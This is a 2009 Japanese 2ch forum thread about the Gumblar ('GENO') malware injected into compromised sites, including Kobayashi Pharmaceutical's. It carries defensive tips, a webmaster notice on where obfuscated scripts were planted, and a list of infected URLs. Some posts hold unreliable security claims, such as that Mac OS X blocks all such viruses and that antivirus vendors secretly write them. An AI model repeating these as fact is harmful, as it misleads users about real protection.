最初にスクリプトを弾いてくれるものの、危険か
どうかの判別まではしてくれないから
結局弾いたサイトのスクリプト使用を許可しちゃうんだよな

>>407
えーでも
商用ソフトで公式対応してりゃあ当然動くだろうけど
>>383 >>396
の理屈でいけば
公式対応してない商用ソフトで
いわゆる管理者権限がいるソフトは動かない確率高いのでは？

管理者権限がいるソフト
という時点でどういうソフトなのか俺には分からないが
誰か余裕があったら解説たのむ

スレタイそんなに悪いのか！？まあうまくはないな
単にスレタイ（ウィルス、小林製薬）で来てみたんだが実は深刻なんだな

>>414
今時業務で普通に使われるソフトで
公式対応してないのがないってこと

遅いところも顧客から対応迫られて
昨年度には対応してる

自分が使ってるアンチウィルスソフトで弾けるか試して見たいけどいい方法ないかな。

＞一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。

とかいう話もある

>>416
ただ、インストールはAdministratorでやらないとインスコできない
ものが多く、ユーザ権限のマシンでインストールができないのは、多い。

まぁ、多いって表現がおかしいんだけれどね。それが当たり前だし。

いままで最強にいやだったウイルスはhikaruだ。
正確にはウイルスじゃないそうだが、俺から言わせればウイルスだ

あれは今でもトラウマ。
ＨＤＤ壊れてもいいからあれに感染するのだけは勘弁

セキュリティソフトも
カスペ＞＞ノートン＞＞＞＞＞＞バスター
なのは十分分かっているが、この中でhikaruを検出するのが
バスターのみって理由だけでバスター使ってるくらいだ

>>419
まぁものによって必要なのは当たり前だね
ただ大半はPowerUsers権限でインストールできたりする

UNIX系もインストールはroot権限必要なんてのは
よくあるし当たり前のことでもあるね

あの余裕のある人がいたら
ぜひちょっと付き合って教えて欲しいのですが

上の>>383 >>396を見て俺なりに
・Vistaはアプリを一般権限でしか動かさない
↓
・今回はAdobeの脆弱性、かつ発動に管理者権限が必要

だからVistaは助かったという理屈でOKですかね？

まあ気を付けたほうがいいよ

外はインフル
中もウイルス

周知あげ

くだらん話題で埋もれていいスレじゃないんだよ

あげる

>>422
まぁ大まかには
それでいいんじゃないでしょうか

これじゃどこも検索できねぇｗｗｗ

>>424
無印には何日も前から、目立つようなスレタイでｗ継続スレが立ってるし
セキュ板にもスレ立ってるし、
これで見逃すような人はいくら宣伝リンク貼っても見に来ないと思う

>>420
処女じゃなかったんだよな
我が目を疑ったわ・・・・

>>426
あ、どうも
となるとついでにもう一つ聞いときたいのですが

>>375
>通常は制限ユーザーで仕事。
>これ最強

今回のウイルス限定という事でなく
そしてデータ管理は他の方法でしっかり行うとして
「仕事は制限ユーザーでログインして行う」
「その他は管理者権限で行う」
というのはある程度の意味というか
メリットありそうですかね？

というのは今回俺が一番気になってる点は
「ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集」
みたいな一文でして
「必要な場合だけ制限ユーザーでログインして入力」
という事にそれなりに意味があるなら
そうしてもいいかなあと思ってるのですが

こういうの発生する度に思うんだが、Windowsのウイルス禍って
MSのいい加減さによる人災だよな。。。

>>430
http://pc11.2ch.net/test/read.cgi/internet/1242450264/

ココの人のほうが詳しいかも　↑

>>420
デイリー検出率ランキング
ttp://mtc.sri.com/live_data/av_rankings/

現在は
トレンド＞シマンテック＞カスペルスキ

ウィルス対策製品は抜きつ抜かれつ
日々競争ですよ

ノートン先生覚醒ってマジ？

見たけどカスペルスキーが検出した。
大したもんだと思った

>>432
おわっインターネットのGENOウイルススレ

ありがとうちょっとここも読んでみます

>>431
いい加減さというか、
ウィルス感染で失う客 ＜ ウィルス対策で失う客
ってことだろ
このスレの伸びの悪さを見ると不等号の数を
＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜＜
くらいに増やしていいくらいだ

どんだけ検出率高くても一つ見逃せば終わるんじゃね？

>>430
メリットあるよ

ちなみにその他じゃなくて、すべて制限ユーザで行って
その中で管理者権限が必要なところがでてきたら、
管理者ユーザとして実行すれば良い
別のユーザとして実行ってメニューがあるから

まなみです！
　　みのりです！
　　　　りさです！

3人そろって、まなみのりさです！

>>157>>186です
結局アンチウイルスのアップデートは2/3で弾く
ニフティセキュリティはページ進行を遮るで
現在リカバリ中

しかし出張中しかつかわないから
Web見たのはGW前になるんだがな
それともメール感染するの？

反日企業

Windowsの制限ユーザでハマったのはSteamのゲームくらいだな
初回起動時にレジストリいじったりDRM入れたりするゲームが時々ある
やってる事はウィルスと変わらんわけで

>>439
あー本当だ「別のユーザとして実行」って出てる
気にした事もなかった

ありがとう
ちょっと自分でもググりつつ
そのような運用を構築してみます

>>433
へー、バスターやるなあ。。。。


っておい！誤検出ランキングじゃねえかよ

一方俺のNOD32は

>>445
ｗｗｗ

生きろｗｗｗ

ある意味豚インフルよりニュースで詳しくとりあげてほしい

>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと＝システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS９以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。

あら、こんな事が起こってたのか…
感染してなさそうなことは確認できたが、ただ単に運が良かっただけみたいだな。

これ知らないで、のほほんとしてる人、凄いいっぱいいそうだね。

とりあえずしりあいに警告はした

あとはあっちが気をつけてくれりゃな

・知らないでのほほんとしている人
・ガクガクブルブルするばかりの人
・一銭にもならないのに一人でも多く救おうとする人
・感染の心配が無いので他人の不幸を見物に来てる人
・この機に乗じてFUDを撒き散らす人

>>445
検出率というと語弊があったか
検知力って書いてたから検知力でいいか
まぁtrue positiveが高いんだから性能としてはいいでしょう？

下から2番目のやつ多そうだなｗ
でもあまりメシウマにはならないと思うが・・・

小さな町の中古車屋のサイトが改ざんされたらしくmartuz.cnから読み込んでますとか出てびっくりした

これドラゴンボールで例えるとどれぐらい危険？

>>431
MS「セキュリティ対策はユーザーの義務です！」ｷﾘｯ

↑そういうセリフはまともなOS作ってから言えやw

あさりたくさんもらって困ったから
保存の仕方や、いろんなレシピ探すのに
おもいきりググりまくったじゃないか・・　　

初めてVistaのUACが役に立ちそうだ。

>>431
それどころかウイルスはMSが作っ　おいおいおい　なにすんだよ　こら

こういうのだとほっとしないか？
http://up2.viploader.net/pic/src/viploader1020375.gif

>>456
たいしたことねーよ。
ヤムチャの狼牙風風拳ぐらい

>>461
やべ、実行された

MSにもAppleにもLinux陣営にもウィルス作る動機があって
もう誰が作ったやら見当もつかない
Sunをクビになった技術者が腹立ちまぎれに作った可能性だってある

なるほどなるほど
一度リストアしてすっきりした上で
新しく管理者ユーザを作成して
今のユーザーを制限ユーザにすれば
いいっぽいわけか

すぐやらねば
役に立つスレでとても助かります

>>462
ヤムチャレベルか、安心しますた。�d

フリーザレベルじゃね？

リストア終了
データほとんどないかららくだし、メインは被害なし
ただ朝会社のpcチェックが恐怖

これってＰＤＦリーダーをアドビから変えれば防げる？

>>460
MSは作ってないだろうが、ヴィルス対策ソフト作ってる会社は
こっそり作ってるだろうな。

84→92→

>>467
えー、レベルが違いすぎる・・・
本当はどっちですか？

50 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 00:33:18.70 ID:8fz7e8f5
リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。

162 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 01:05:12.95 ID:8fz7e8f5
ああ本当に壊れた
再インストールすらさせてもらえない
何かしようとしても強制終了される。

204 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 01:15:09.39 ID:8fz7e8f5
》167ありがとうございますけど駄目でした。
今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。
日曜出動までして何してんだろ俺？もう帰宅します。明日上司になんて説明しようか？

995 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 09:53:37.05 ID:8fz7e8f5
会社のPCでZIP落としてるのばれた。
本当に死にたい。

144 名前： ケンタウレア・モンタナ(コネチカット州)[] 投稿日：2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ

940 名前： ミツマタ(東京都)[] 投稿日：2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように

このスレに気づかずに管理人に連絡とったのが悔やまれる

これってさ小林製薬の中の人が勤務中に会社のPCで同人サイト閲覧して感染しその感染PCでサイト更新したってこと？

>>473
そいつリアルタイムで見てたわ
願いが叶ったなｗ

>>474
同人サイトかどうかは知らないが、他は概ねそのとおり
もしかすると特殊清掃系サイトだったかもしれない

>>472
少なくともヤムチャではないと思うが。
ヤムチャがアンチウイルスソフト（クリリン〜ベジータレベル）の攻撃を
残らず避けて来れると思うのか？

知らずに勤務中に見ててやっちゃったら人生狂いそうだな

>>473
何のzip落としてたんだろう。
ていうか、不器用なやつだなぁ。

つか同人界隈しか広がってないように聞こえるけど

実際は出版だのゲーム屋だの楽天のショップだの酷いことになってるから
一概にどこで拾ったとは言えない気がする

>>473

Windowsでネットしてると、人生を強制終了させられるのなw

>>477
かなり危なそうですね。
今のところ大丈夫みたいですが、これからも気をつけます。
ｱﾘｶﾞﾄﾝ

>>480
楽天アウトなの？
マジで？

これ感染してる人いっぱいいそうだな

>>479
感染していたＧＥＮＯサイトへの偽装リンクを、なぜかＺＩＰだと思ってｗ踏んだらしい

いちばんタチ悪いのは、こうやってわざと感染サイトを踏ませようとするやつが出てくることかもな

>>483
全部じゃねえぞｗ

>>480
同人サイトは管理人同士が見る確率高いから広まりやすいってだけだ

アンチウイルスに頼ってる人は遅かれ早かれ感染するぞ
マヂな話アンチウイルスの更新は現状のウイルスに対してもはや手遅れ状態
新型やその亜種の初期感染を防ぐ事はほぼ不可能になっている
ウイルス犯罪者の更新が早すぎて亜種の判別と対策に追いつていないのだよ
有志の検体提出を受けて対応を取ってもすぐに亜種が作成されてしまう
イタチごっこが今のネットウイルスの実情
根本的にウイルスに感染しない、もしくは感染しても被害が及ばないような対策を取るしかないのだよ

出版社とか新聞社とか感染しまくってそう

今後の影響としては本屋でのエロ本の売上が伸びそうだな

またAdobe Flash Playerかよ
廃止しろ廃止

定石として一番得する者が犯・・・ゲフンゲフン

>>489
クルッポーのサイトとか今感染したら、凄いことになりそうな気がするｗ

　　　　　　　　　　　　 ／）
　　　　　　　　　　　／／／）
　　　　　　　　　 ／,.=ﾞ''"／
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　キャッシュ消せばいいんだよ！
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

>>492
新アンチウイルスソフト、「ネットバーロー」とか作らにゃあかんな。

>>491
そういや前にXREAの広告改竄された時もFlashだったな・・・

>>494
GENOのあのコメントは唖然としたわ

VistaとSilverlightを普及させるためn…おや？誰か来たようだ。ちょっと玄関に行ってくるノシ

なんでこの週末になって GENO ウイルス(gumblar.cn)が話題になっているの？
自分が初めて知ったのは5/7だったが、それから1週間ぐらい経って亜種が出てきてウイルスソフトの対策より
広まったの？

>>499
一件マトモな企業HPまで感染し始めたから

サイト閲覧でもインフルエンザ感染すんの？
パソコンまじコワス

2次元でも3次元でもパンデミックでござる　の巻

リアルでもネットでもウイルス祭り…、安息の地は何処にあるんだ

今思ったんだが、これAdobeのサイトが改ざんされたら悲惨なことにならないか？

>>504
海外じゃとっくにAdobeそっくりのトロイダウンロードサイトが出来てる

取りあえず暫くはPCからサイトは見ないようにするわ

恥を忍んで聞くけどadobeって何て読むの？
アドベ？アドーブ？

adobe社はアドビと主張しています

>>508
ごめんググったら一番に出てきたわ
ありがとう
あなたにとって今日が幸せでありますように

まじでマックに乗り換えといて大正解だったわ

いまだ古いOSを使っとるよ
ネットするらなこれくらいで充分・・・

海外の人は読めない名前とかどうやって読んでんだろうな
カタカナとかローマ字とかないだろうし

マックOS9まじお薦め

>>511
まあ確実にウイルスばらまいてるだろうな。

あと本当にみてるだけならまだ大丈夫だけど
ネットショッピングとかしてるとアウトだしメールものぞかれててもおかしくないって忠告はしとく。

>>512
辞書を引く

ワクチンをすべてのセキュリティソフトで共有できるようにすればいいのに

オレもアップルのMacOS X使ってるからウィルスとか無縁。

思わずネットは広大だわとか言いたくなる

いいかげんにしろ
マカがうざすぎ
アボーン出来ないようにわざと毎回ID変えてやがるし
死んじまえマジで

>>513
今まさに、PS6を使うために起動中だわｗ
軽くていい。

昨日調べまくって一日が終わって感染はしてなかったが
当分携帯厨にジョブチェンジ(´･ω･`)ｂ

>>521
もう対策パッチでてるから　そんな身構えなくていいよ

マスクしてれば感染しない。

GENOウイルスの亜種か？

おまえらjavaやFlash使いまくりのサイト閲覧しててGENOウィルスは知ってるんだろうな？
史上最強最悪のウィルスが大企業や役所のサイトまで汚染してるんだぜ？
楽天内の某ショップや、普通の通販サイトも感染している。
単にそのサイトを見ただけで感染してしまう。
セキュリティソフトはどれも対応していない（avast!のみ警告あり）
感染したが最後、セキュリティシステムはボロボロにされるわ、
トロイやスパイウェアをテンコ盛りでインスコされるんだぞ。
新型インフルエンザなんてメじゃないほどの大流行。
「しばらくはPCやめて携帯でネットするわ」とか、
「明日は会社で１日かけて対策が必要だあ..orz」とか、
実態を知った人の間ではパニック状態になっている。

実態を知らなければ平和かって？
クレカ情報からアドレス帳、パスワード類が流出しまくっても平和と言えるならな。

【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性（小林製薬）[09/05/14]
http://tsushima.2ch.net/test/read.cgi/newsplus/1242546568/

やっちまった(´･ω･`)
新型インフル関連スレにあるリンクを踏んだのが原因っぽい
DOS窓開かない、regedit開かない、Yahoo開かない
HDDのランプが不自然に点滅....
もうダメだ

>>526
早く保健所に電話するんだ

　　　　　　　　　　　　　_,,..r'''""~~`''ｰ-.､ 
　　　　　　　　　　　 ,,.r,:-‐'''"""~~`ヽ､:;:;:＼ 
　　　　　　　　　　 r"r　　　　　　　　　 ゝ､:;:ヽ 
　　 r‐-､　　 ,...,,　|;;;;|　　　　　　　,,.-‐-:､ ヾ;:;ゝ 
　　 :i!　 i!　　|: : i! ヾ| r'"~~` :;:　::;",,-‐‐-　 `r'^! 
　　　 !　 i!. 　|　 ;|　l| 　''"~~　　　､　　　　　　i' | 
　　 　 i!　ヽ　|　　|　|　　　 ,.:'"　　　､ヽ､　　　!,ﾉ 
　　　　ゝ　 `-! 　:|　i!　　.:;:　'~~ｰ~~'"　ﾞヾ　: : ::| 
　　 r'"~`ヾ、　　　i!　i!　　 ,,-ｪェI二エﾌﾌ　: : :::ﾉ~|`T　＜イエーイ、XP房見てるー？ 
　　,.ゝ､　　r'""`ヽ､i!　`:､　　 ー　-　'"　:: : :／ ,/ 
　　!､　 `ヽ､ー､　　 ヽ‐''"`ヾ､.....,,,,＿,,,,.-‐'",..-'" 
　　 | ＼ i:" ）　　　　 |　　　~`'''ー---―''"~ 
　　　ヽ　`'"　　　　 ノ 

GENOの謝罪ｷﾀ━━━━━(ﾟ∀ﾟ)━━━━━ !!!!!

よく分からないんだけどこれ、ノートンではまだ対応してないんだよね？
執筆の仕事でPC使ってるから、かなり怖い。
しばらくネットつながないで頑張るか。

しかしうかうか検索もできんな
ヤムチャってそんなに弱かったか
検索したいんだが

>>514
そろそろ使って十年になるけど何もない
メール開いてない
ネットショッピングは年にするかしないか
2chは専ブラ

ﾄﾎﾎﾎ

>>531
javascript java ActiveX この辺りoffにしてブラウズしてりゃ平気じゃね？

俺がGENOだああああああああああああああ！！！！！！！！！

心配なのは会社のPC

ネットショッピングしてるとjavascript onにさせられるしなぁｗ

java scriptのoffの仕方教えてくれんか

C:\WINDOWS\system32\sqlsodbc.chm

を検索かけたら見つからないんだけど…(((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>538
C:\Windows\Help\mui\0411
C:\Windows\Help\mui\0409
のどっちかにあるはず

とりあえず容量ちがったら死亡

>>537
JavaScriptのON/OFF
http://www.pori2.net/js/kihon/1.html

ぐぐって一発目のサイトだがこれでいけそう

>>530
駆除できないってだけで、検出はほとんどが対策済み。
セキュリティソフト持ってないなら AdobeReaderのスクリプトをオフにすればいい

>>538
OSはなに？

>>540
ありがとう
できました

びびりすぎてググることもせずに聞いてしまって申し訳ない
でも助かりました

>>542
心配掛けてすみません
オフにできました

アドビのスクリプトもオフにせなあかんのやな

Adobe Reader 9.x の Java Script を無効化する方法
http://blogs.wankuma.com/tyappi/archive/2009/03/15/169723.aspx

>>542
安価先自分じゃなかった・・・ｗ
焦りすぎですね俺・・・

>>545
餅搗いてコーヒー飲めｗ

焦ると失敗しまくるぞ・・・　orz

MacOS8,6で何か気をつけることはありますか？

マカーは大丈夫

VISTAなんだけどUAC切ってたら意味ない？

意味無い

フラッシュってアドビじゃなくてマクロメディアだろｊｋ的

4年前に合併してんだろ

インフルAもやばいがこのウイルスもやべーな

>>551
資本持ってる奴には勝てないんよ・・・・(´；ω；`)

初めてVISTAでよかったと思ったｗ

今見てきたけど、別に何もなかったよ。
Googleデスクトップ使用の、WindowsXP-SP3 +IE8 +ファイアーフォックス使い。

http://www.kobayashi.co.jp/

なんちゃってVistaと人からは酷評浴びてる。

製薬会社だからウイルスか…。

>>556
そりゃ公表した時点で改竄されてるところは閉鎖してるだろ
しかもwww.kobayashi.co.jpはもとから改ざんされてないし

マスク紹介のページとかだったら、
頭いいなこれw

自分の使ってるｈｐのノートPCは最初の初期設定ではアドビはOff。
タブをクリックしないと起動できない設定。もちろん起動は可能。

Googleはさすがに凄いな。

だから別に何も起きないわけだが。

>>558
昔のHDクラッシュ・タイプに比べれば軽いと思うよ。
要は、IEも切りアドビも切って日本語ソフトもOff。これで問題ないだろ。ｗ

VistaのUAC最強だなｗ

これって Adobe 突っつくアレか

出社したやつらが何も知らずに繋いで阿鼻叫喚の図が

AdobeReaderｱﾝｲﾝｽｺしてる俺に隙はなかった

続々発生しているらしい亜種たちがこわいお

USBメモリで感染するウイルスもそうだけど、こういう明らかにWindowsの構造
自体が原因になってるウイルス被害ってMSに賠償請求できないの？

>>567
だったらMacかLinux使ってね(はぁと

で終了。

ｱｳﾞｧさんがトロイの木馬が〜と逝ってたサイトがあったがGENO感染してたサイトなんだろうか・・・。

>>568
構造欠陥のある車で事故多発させてるメーカーが、じゃあ他社の車
にすればいいだろで済む訳がないw

>>567
何のために糞長い契約に同意させてるんだ

とりあえずageないとまずい希ガス

構造欠陥ねw
コードの走らない箱は安全ですってか
PCの電源入れなければ安全じゃね？

>>573

実際MacやLinuxのようなUNIX系のOSはアプリとシステムの実行権限を明確にわけて、
万一事故ってもエンジンに火が回らないような構造になっているわけで。

リアルもネットもパンデミックとかマジ勘弁してくれよ。

>>564
夜勤組だがうちの職場はまだ大丈夫で残念だった

これはマズい

伸びるのはこれから…？

とりあえず>>4に社長賞

こりゃ対処のしようがないね

小林製薬って変態新聞スポンサーじゃん

小林製薬の糸ようじ

水曜どうでしょうバカの脊髄反射

こんないい加減なOS売りつけやがって

こんないい加減なOS買ったのは俺らだがな

>>583
PC買ったら勝手に抱き合わせで買わされただけ。

違いないな

>>583
ユーザは選んで買ったわけじゃないからw
MSが独禁法違反やらかしてまでOSの選択肢潰しやった挙げ句のこの有様。

現代の日本にMacを買えない地域があるとは知らなかった。

cmdでdos立ちあがんねぇｗｗｗｗｗｗｗｗｗｗｗｗｗ俺のpcｵﾀﾜｗｗｗｗｗｗｗｗｗｗﾏｲｱﾐｗｗｗｗｗｗｗｗｗｗｗｗ
対処わかるまで電源付けっぱなしかよ。一時中断は大丈夫だよな？

>>584,586
リナクソでも入れりゃいいじゃん

日立がBeOSのプリインストールの意思をMicrosoftに伝えたところ、Microsoftが彼らの怒りを
伝えるために2人のマネージャーを日本に派遣し、Beとの間の合意やWindowsライセンスについ
て再考するように促した。その結果、起動シーケンスからBeOSの存在を示すものは排除され、
BeOSの起動はフロッピーディスクを必要とする手間のかかるものになってしまったという。
また、Compaqが計画していたBeOS搭載のIAも、Microsoftの圧力により開発途上で中止とな
ったという。

http://pc.watch.impress.co.jp/docs/2002/0220/be.htm

>>584,586
はLinuxが使えないから文句を言ってるわけで

XP厨m9(^Д^)ﾌﾟｷﾞｬｰ

XPだけど、Norton入れてたら大丈夫？

ノートンなんて飾りです

質問ですまんが
コマンドプロンプトで
dir C:\Windows\help\mui\0411でentar押して、
いっぱい出てきたんだけどこの中のsqlsodbc.chmが50,727だったらセフセフ？

セフセフとは言い切れないのが厄介なところ。
解決策はクリーンインストールのみ。

　　　　　　　　　　　　 ／）
　　　　　　　　　　　／／／）
　　　　　　　　　 ／,.=ﾞ''"／
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　キャッシュ(現金)消されりゃいいんだよ！
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

そもそも、小林製薬の製品で効果があったためしが無い。
全くなんなのよこの会社は！ﾌﾟﾝﾌﾟﾝ

ｱｳｱｳ（＾ω＾）ｾﾌｾﾌ

小林製薬の糸ようじ

>>596>>599どっちだよ畜生！

改ざんされすぎｗ

やばいな、これは

賠償金でマイクロソフト潰れちゃう！

糸ようじ

GENOウィルスの亜種なのか？

とりあえず最新版にupdateしてJavaScriptをOFF、
セキュ板であげられていたIPを遮断した

　　　　　　　　　　　　 ／）
　　　　　　　　　　　／／／）
　　　　　　　　　 ／,.=ﾞ''"／
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　ネカフェで閲覧すりゃあいいんだよ！
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

みっちゃんがあやしい・・・

http://www.matousec.com/projects/proactive-security-challenge/results.php

Sランク
Online Armor Personal Firewall 3.5.0.14
Comodo Internet Security 3.8.65951.477
Outpost Firewall Free 2009 6.5.2724.381.0687.328
Outpost Security Suite Pro 2009 6.5.2514.381.0685

アッー！小林製薬

インターネットを見てるとブラクラに引っかかった！
そんな時ってありますよね
そんな時は小林製薬のウイルスニゲール！
薬効成分のTDNとDBがウイルスを撃退！
これで安心してインターネットを楽しめます

小林製薬のウイルスニゲール

おっ、立ってたのか

>>592
ちくしょー

次スレが立つのならば、スレタイをもう少し変えたほうがいい
ＧＥＮＯウイルスって通称を使ってくれ

ネサフできねぇよ。
いつになったら治まるんだ。
いい加減にしてくれ。

どうバカ集合糸ようじスレ

Webサイト製作 ご担当者さま
■ お願い

御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア（コンピュータウイルス）を
ダウンロードさせるスクリプトが挿入されております。
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知をお願いします。

この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。

同様のスクリプトの仕込まれたHPを閲覧することで、そのPCにウイルス本体が感染します。
感染したPCを利用して、HPの更新作業を行なうと、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが）感染を広げるための
スクリプトの埋め込みを行なうようです。

他者から報告があり、当方でも確認したところ、確かに危険コードが含まれておりました。
HP閲覧者のPCにウイルスが勝手にダウンロードされてしまうため、御社のHPが意図せぬ加害者と
なっております。

■ 確認した感染ページ
<多分、全てのページが感染中>
　●HTMLファイルの場合
　　<body>タグの直前に難読化されたコードが埋め込まれる。
　　（例外的に<body>タグが存在しないページの場合は危険コードの挿入箇所を見付けられず
　　　危険コードが埋めこまれないようです）
　●PHPの場合
　　ファイルの最初に難読化されたコードが埋め込まれる。
　●JSの場合
　　ファイルの最後に難読化されたコードが埋め込まれる。
　その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。

感染にまったく気づいてなくて、ある時ふと再起動した瞬間死亡とか

感染確定サイト (14)    

  senn特殊光源     www.senlights.co.jp/index.html  
  livmail     www.livmail.com/3others-page/janet/tokusen/index.htm　既出  
  スカイハイプレミアム     skyhighpremium.com　追加  
  Carwash     http://www.carwash.co.jp/　既出  
  成美○出版     www.seibidoshuppan.co.jp/　既出  
  Akemi ○ayashi Website     replica08.web.fc2.com/ 既出。チェッカで1000％  
  主上支局     http://ssfos.hp.infoseek.co.jp/  
  テイアラモード     www.tiaramode.com　ここも散々既出でしょうけど  
  ペットの姓名判断のサイト     www.laqoo.net/kyouun/pet/index.html  
  帰ってき○三日天下     mikkatenka.sakura.ne.jp/　黒  
  烏骨鶏     www.ukokkei.co.jp　確定  
  株式会社まどか     www.madoka-soft.co.jp　ここも  
  リボンマジック     www.ribbonmagic.com　発端だと言われているサイト、チェッカー結果1000%で真っ黒  
  Replica     replica08.web.fc2.com/index.html 感染確定サイト、対処予定ですが現在真っ黒。  


感染対策済みのサイト(10)

  ・小林製薬
  ・BIG-server.com】
  ・ウェルネス（医療情報提供企業）
  ・薬事日報社
  ・国交省中部地方整備局岐阜国道事務所
  ・全日本民医連
  ・総合ホビー展示即売会「ホビコン」
  ・GENO（PC通販ショップ）
  ・NHT紀尾井町グループ（自毛植毛斡旋企業）
  ・SayMove！
  ・ライブハウス「あさがやドラム」

vistaで良かった

avast以外は対応してないのか？
ESET使ってるんだけど一時的にでもavastに切り替えた方がいいんだろうか

製薬会社HPがウイルス感染
ちょっとしたギャグだな

晒しage

>>620
って初めて思ったんですね。わかります。

>>621
avastが大暴れするから回避出来るよ。
まぁ後は運だわな

心配なヤツはここ見てこい

GENOｳｨﾙｽ亜種が爆発的に増殖か小林製薬や同人サイト他中心に感染も7
http://takeshima.2ch.net/test/read.cgi/news4vip/1242576012/

>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと＝システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS９以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。

Vistaだから大丈夫！(*^ーﾟ)b

薬にウイルスじゃなくてよかったじゃないか

FTP使ってサイトやってる奴や
ネットでクレカとか使って買い物してる奴は気をつけろな

>>630
まあ気をつけると言ってもその程度だよな

ESETというかNOD32ユーザーだけど、感染してたんでクリーンインスコして
一時的にavast!に入れ替えてるよ


…単に実家にNOD32のCDを置き忘れてきたからなんだけどね

いやーネットサーフィン超自粛とか、
気をつけることはあるさ。

仕事でネット使う場合は困るけどなー
ほんとどうしよう。。

俺なんかAdobe Acrobat ReaderもAdobe Flash Playerも
アンインストールしちゃった。
動画サイト観れねぇ。

>>634
羹に懲りて膾を吹いたんですね(^_^;)

;;;;;;;;;;;/ﾞ:::::::::::::　＼::::＼　　　　ミ川川川川川川彡　
;;;;;;;/:::::::::::::::::::::::　ヽ:::ﾞ|ヽ　　ミ　　　　　　　　　　彡
;;;/::::::::::::::::::::::::::::::::: ＼l,ll,　 三　　　　　　な　　　三
/::::::::::::::::::::::: : : : :::::'　ヽ ||　三　　　　　　ぜ　　　三
:::::::::::::::::::::: : 　　　 : : ::｜||　三　　 な　　　　　　 三
:::::::::::::::::::: 　　　　　　 : :｜||　　　　 っ　　 こ　　　三
:::::::::::::::: 　　　　　　　　 : :|| i　　　　て 　　ん　　　三
:::::::::::::: : ,,,,,,,,,,,,,,,,,_　　　 : :|| l,_　　　 し　　 な　　　三
;;::::::::::: ｜　　　　　ﾞﾟ＼,　　ﾞ|| llﾞ＼　 ま 　　こ　　　三
:::;:::::::: : ＼,:::::::::::::::::::::: li　　||:::::::::l　　っ 　　と 　　三
;:::::::::: 　　.＼,:::::::::::::::::::/　　,r::::_/　　た　 に　　　三
:::::::::::: 　　　　ヽ一一''°　 lﾞll″　　 ん　　　　　　三
::::::::::::　　　　 　 　 　 　 　 l|ll　　　　だ　　　　　　三
:::::::::::: 　　　　　　　　　　　,lll′　　　　　　　　　　三
,、::::::::: 　　　　　　　　　　 ,ll゜　　　　　　　　　　　三
;ヽ::::::::::: 　　　　＿＿＿__ll′三　　　　　　　　　三
;;;;;ヽ::::::::: 　　　｜｜＿__｜　　彡　　　　　　　　ミ　　
;;;;;;;ヽ,:::::::: 　　｜　　l___｜ヽ　　　彡川川川川ミ
;;;;;;;;;;＼,,,＿_＿_＼_/__/　　＼
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;＼　::::::::　::::――ヽ

気付かなかった一応立ってたのか
sqlsodbc.chmでヘルプが開かなかったらアウツ

パンデミックあげ。

楽天サイトも感染してたんかいな！！いつ頃？
４月に買い物してるよorz

>>324
